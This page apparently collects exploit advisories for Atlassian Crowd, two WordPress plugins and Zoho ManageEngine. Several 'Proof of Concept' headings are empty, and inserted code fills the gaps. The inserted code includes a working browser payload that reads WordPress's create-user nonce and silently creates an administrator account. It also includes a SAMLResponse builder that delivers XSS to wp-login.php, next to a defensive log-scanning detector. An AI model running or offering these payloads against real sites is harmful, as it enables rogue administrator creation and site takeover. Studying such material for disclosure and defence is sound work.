Sharing my proof of concept for Atlassian Crowd RCE – CVE-2019-11580. I was going to make a blog post detailing all the inner workings but someone has already made a very detailed analysis here: https://www.corben.io/atlassian-crowd-rce/
You can find all the source code here:
An issue was discovered in the wp-code-highlightjs plugin through 0.6.2 for WordPress.
wp-admin/options-general.php?page=wp-code-highlight-js allows CSRF, as demonstrated by an XSS payload in the hljs_additional_css parameter.
An attacker can use the CSRF to store a script tag in that setting, which then executes wherever the stored value is rendered. Coupled with a WordPress user-creation payload (run in the browser of a logged-in administrator), this could potentially lead to RCE.
Proof of Concept:
where poc.js could be a payload similar to:
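As an added illustration of the user-creation stage the advisory describes (this is not the advisory's own poc.js, which is not reproduced on this page), the following script performs the chain from inside the victim administrator's browser: it fetches wp-admin/user-new.php to read the create-user nonce, then posts a new administrator account. The field and nonce names are the standard WordPress ones; the hostname, account details and the injectable fetch are assumptions for illustration.

```javascript
// Added illustration (not the advisory's poc.js): the "user-create payload" stage of the
// CSRF -> stored XSS -> admin chain. Runs in the victim admin's browser, so the session
// cookie is sent automatically; the only obstacle is WordPress's create-user nonce, which
// is read out of the user-new.php form first. Field/nonce names are standard WordPress.

const NONCE_RE = /name="_wpnonce_create-user"\s+value="([0-9a-f]+)"/;

// Pull the create-user nonce out of the rendered user-new.php page.
function extractCreateUserNonce(html) {
  const m = NONCE_RE.exec(html);
  return m ? m[1] : null;
}

// Build the application/x-www-form-urlencoded body user-new.php expects.
function buildCreateUserBody(nonce, { login, email, password }) {
  return new URLSearchParams({
    action: 'createuser',
    '_wpnonce_create-user': nonce,
    user_login: login,
    email,
    pass1: password,
    pass2: password,
    role: 'administrator',
  }).toString();
}

// The two-step chain: GET the form for its nonce, then POST the new user.
// `fetchImpl` is injectable so the logic can be exercised offline (hypothetical parameter).
async function createAdminUser(baseUrl, account, fetchImpl = fetch) {
  const formUrl = `${baseUrl}/wp-admin/user-new.php`;
  const page = await fetchImpl(formUrl, { credentials: 'include' });
  const nonce = extractCreateUserNonce(await page.text());
  if (!nonce) {
    return { ok: false, reason: 'nonce not found (viewer is not an administrator?)' };
  }
  const body = buildCreateUserBody(nonce, account);
  const res = await fetchImpl(formUrl, {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body,
  });
  return { ok: res.ok, status: res.status, nonce, body };
}

// Example invocation (hostname and account are assumed values).
// createAdminUser('https://victim.com', { login: 'backup', email: 'b@example.com', password: 'Str0ng!pass' });
```

The script only succeeds when the page that loads it is viewed by a user who can create accounts; for anyone else the nonce is absent and the function returns early. That dependency on the viewer's privileges is exactly why a CSRF that stores a script tag in a site-wide setting is more than a self-XSS.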
miniOrange SAML SP Single Sign On WordPress Plugin versions 4.8.72 and below are vulnerable to cross-site scripting via a specially crafted SAMLResponse XML payload.
The exploit works by passing a crafted SAMLResponse and RelayState parameter to https://victim.com/wp-login.php
The plugin parses the SAMLResponse, and when the status is anything other than Success it writes the offending value into the response unescaped, so any HTML placed in that value is rendered.
For example, a SAMLResponse payload will look like this:
This payload must be Base64 encoded and sent as the SAMLResponse parameter along with RelayState=testValidate.
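The request described above, as an added example that is not the advisory's proof of concept: it builds the Base64 SAMLResponse and the RelayState=testValidate form body for wp-login.php, and models the status check on the server side both as the plugin behaves (status echoed raw) and as it should (status HTML-escaped). Where exactly the plugin reads the status is not stated on this page; the example assumes the HTML is carried in the StatusCode Value attribute, XML-escaped so that a strict XML parser accepts it and hands back raw HTML.

```javascript
// Added illustration, not the advisory's proof of concept. Assumed, not stated by the
// advisory: the HTML rides in the StatusCode Value attribute of a samlp:Response.

const SUCCESS = 'urn:oasis:names:tc:SAML:2.0:status:Success';

const escapeXmlAttr = (s) => s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
  .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
const unescapeXmlAttr = (s) => s.replace(/&quot;/g, '"').replace(/&gt;/g, '>')
  .replace(/&lt;/g, '<').replace(/&amp;/g, '&');
const escapeHtml = (s) => escapeXmlAttr(s).replace(/'/g, '&#39;');

// Minimal samlp:Response whose status is the attacker-chosen value. The value is
// XML-escaped so the document stays well-formed; the parser decodes it back to HTML.
function buildSamlResponseXml(statusValue) {
  return '<?xml version="1.0" encoding="UTF-8"?>' +
    '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ' +
    'ID="_r1" Version="2.0" IssueInstant="2019-01-01T00:00:00Z" ' +
    'Destination="https://victim.com/wp-login.php">' +
    '<samlp:Status><samlp:StatusCode Value="' + escapeXmlAttr(statusValue) + '"/></samlp:Status>' +
    '</samlp:Response>';
}

// Form body for POST https://victim.com/wp-login.php (Base64 SAMLResponse + RelayState).
function buildLoginPostBody(statusValue) {
  const xml = buildSamlResponseXml(statusValue);
  return new URLSearchParams({
    SAMLResponse: Buffer.from(xml, 'utf8').toString('base64'),
    RelayState: 'testValidate',
  }).toString();
}

// Server-side model: decode the response and pull out the StatusCode value.
function statusFromResponse(base64Response) {
  const xml = Buffer.from(base64Response, 'base64').toString('utf8');
  const m = /<samlp:StatusCode\s+Value="([^"]*)"/.exec(xml);
  return m ? unescapeXmlAttr(m[1]) : null;
}

// Vulnerable form: a non-Success status is echoed into the page unescaped.
function renderStatusVulnerable(base64Response) {
  const s = statusFromResponse(base64Response);
  return s === SUCCESS ? 'OK' : 'Invalid SAML status: ' + s;
}

// Fixed form: escape before output (esc_html() in the WordPress/PHP world).
function renderStatusFixed(base64Response) {
  const s = statusFromResponse(base64Response);
  return s === SUCCESS ? 'OK' : 'Invalid SAML status: ' + escapeHtml(String(s));
}
```

The message is unsigned and the status is not Success, so a correct SP should reject it before anything is rendered; the bug is that the rejection path itself reflects attacker-controlled XML text into HTML.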
Proof of concept:
RestAPI/PasswordSelfServiceAPI in Zoho ManageEngine ADSelfService Plus version 5707 and below allows remote attackers to inject arbitrary web script or HTML via the PSS_OPERATION parameter.
Example Proof of Concept:
Stored XSS payload:
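An added detection example, not the advisory's proof of concept (the payload itself is not reproduced on this page): it walks access-log lines and flags requests to the RestAPI/PasswordSelfServiceAPI endpoint whose PSS_OPERATION value contains markup after URL-decoding, including double-encoded values. The endpoint path and parameter name come from the advisory; the combined-style log format, the query-string delivery and the sample lines are constructed assumptions.

```javascript
// Added example (not the advisory's PoC): flag PSS_OPERATION values carrying markup in
// access logs. Only query-string delivery is visible in a request line; a value sent in a
// POST body would need the body to be logged. Sample log lines below are constructed.

const TARGET_PATH = '/RestAPI/PasswordSelfServiceAPI';
const PARAM = 'PSS_OPERATION';
// Tag openers, javascript: URLs and inline event handlers.
const MARKUP_RE = /<[a-z!\/]|javascript:|on\w+\s*=/i;

// Percent-decode repeatedly (bounded) so %253C is seen as '<', not left as %3C.
function fullyDecode(s, limit = 3) {
  let cur = s;
  for (let i = 0; i < limit; i++) {
    let next;
    try { next = decodeURIComponent(cur.replace(/\+/g, ' ')); } catch { return cur; }
    if (next === cur) return cur;
    cur = next;
  }
  return cur;
}

// Returns null for lines that are not requests to the target endpoint.
function inspectRequestLine(logLine) {
  const m = /"(?:GET|POST)\s+(\S+)\s+HTTP/.exec(logLine);
  if (!m) return null;
  const [path, query = ''] = m[1].split('?', 2);
  if (!path.startsWith(TARGET_PATH)) return null;
  const raw = new URLSearchParams(query).get(PARAM); // first decode happens here
  if (raw === null) return { path, value: null, suspicious: false };
  const value = fullyDecode(raw);
  return { path, value, suspicious: MARKUP_RE.test(value) };
}

function findSuspicious(lines) {
  return lines.map(inspectRequestLine).filter((r) => r && r.suspicious);
}

// Constructed sample: one benign operation, one encoded tag, one double-encoded tag, one unrelated request.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2019:10:00:00 +0000] "GET /RestAPI/PasswordSelfServiceAPI?PSS_OPERATION=resetPassword HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Jan/2019:10:00:01 +0000] "GET /RestAPI/PasswordSelfServiceAPI?PSS_OPERATION=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 640',
  '10.0.0.9 - - [01/Jan/2019:10:00:02 +0000] "GET /RestAPI/PasswordSelfServiceAPI?PSS_OPERATION=%253Cscript%253E HTTP/1.1" 200 640',
  '10.0.0.7 - - [01/Jan/2019:10:00:03 +0000] "GET /wp-login.php HTTP/1.1" 200 100',
];

for (const hit of findSuspicious(SAMPLE_LOG)) {
  console.log(`suspicious ${PARAM}: ${hit.value}`);
}
```

The bounded repeated decode is the part worth keeping: a single decode, which is what most log tooling does, misses the double-encoded form, while an unbounded loop can be made to spin on pathological input.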